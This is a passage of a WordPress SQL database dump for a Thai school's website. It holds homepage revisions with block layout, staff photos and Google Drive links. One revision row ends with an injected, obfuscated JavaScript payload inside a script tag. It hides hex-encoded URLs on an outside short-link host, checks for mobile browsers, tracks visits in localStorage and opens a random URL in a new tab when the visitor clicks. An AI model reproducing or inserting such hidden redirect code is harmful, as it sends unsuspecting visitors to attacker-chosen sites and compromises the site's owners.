x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-11-13 11:52:11','2025-11-13 04:52:11','',19,'http://watprato.ssk.in.th/?p=755',0,'revision','',0),
(757,1,'2025-11-13 11:54:44','2025-11-13 04:54:44','','572095115_122254848554202781_886880693938319365_n','','inherit','open','closed','','572095115_122254848554202781_886880693938319365_n-2','','','2025-11-13 11:54:44','2025-11-13 04:54:44','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n-1.jpg',0,'attachment','image/jpeg',0),
(758,1,'2025-11-13 11:55:20','2025-11-13 04:55:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"style\":{\"typography\":{\"fontSize\":\"25px\"}}} -->\n<p class=\"has-text-align-center\" style=\"font-size:25px\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":754,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img 